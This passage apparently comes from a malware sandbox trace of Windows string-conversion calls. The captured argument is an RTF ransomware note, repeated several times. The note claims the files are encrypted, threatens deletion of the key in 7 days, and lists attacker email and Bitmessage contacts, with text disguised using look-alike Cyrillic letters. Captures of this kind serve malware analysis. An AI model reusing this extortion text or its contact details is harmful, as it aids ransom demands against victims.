FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.492] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.492] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 